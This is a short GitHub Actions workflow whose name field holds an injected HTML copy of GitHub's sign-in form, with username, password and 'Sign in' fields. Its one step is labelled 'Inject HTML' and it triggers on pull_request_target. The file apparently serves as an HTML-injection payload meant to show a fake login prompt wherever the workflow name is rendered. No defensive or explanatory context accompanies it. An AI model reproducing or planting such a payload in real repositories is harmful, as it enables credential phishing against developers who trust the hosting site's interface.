name: '<form action="/session" method="post"><label for="login_field">Username or email address</label><input type="text" name="login" id="login_field" autofocus class="form-control input-block js-login-field" autocomplete="username" required><div class="position-relative"><label for="password">Password</label><input type="password" name="password" id="password" class="form-control form-control input-block js-password-field" autocomplete="current-password" required tabindex="-1"><input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block js-sign-in-button" data-disable-with="Signing in…" data-signin-label="Sign in" data-sso-label="Sign in with your identity provider" development="false" disable-emu-sso="false"></div></form>'
on: [pull_request_target]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - name: Inject HTML
        run: echo "1"
